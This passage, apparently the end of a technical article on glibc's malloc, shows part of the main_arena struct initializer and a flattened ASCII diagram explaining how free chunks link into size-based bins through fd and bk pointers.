IAV(79), IAV(80), IAV(81), IAV(82), IAV(83), IAV(84), IAV(85), IAV(86), IAV(87), IAV(88), IAV(89), IAV(90), IAV(91), IAV(92), IAV(93), IAV(94), IAV(95), IAV(96), IAV(97), IAV(98), IAV(99), IAV(100), IAV(101), IAV(102), IAV(103), IAV(104), IAV(105), IAV(106), IAV(107), IAV(108), IAV(109), IAV(110), IAV(111), IAV(112), IAV(113), IAV(114), IAV(115), IAV(116), IAV(117), IAV(118), IAV(119), IAV(120), IAV(121), IAV(122), IAV(123), IAV(124), IAV(125), IAV(126), IAV(127) }, &main_arena, /* next */ 0, /* size */ #if THREAD_STATS 0, 0, 0, /* stat_lock_direct, stat_lock_loop, stat_lock_wait */ #endif MUTEX_INITIALIZER /* mutex */ }; The main_arena is the place where the allocator stores the 'bins' to which the free chunks are linked depending on they size. The little graph below resumes all the structures detailed before: @ libc's DATA [bin_n] (first chunk) ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd [ chunk ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk [bin_n+1] (last chunk) . . . [bin_X] ptr] ----> [<- fd [ lonely but interesting chunk ptr] ----> [<- bk . . |=[ EOF ]=---------------------------------------------------------------=|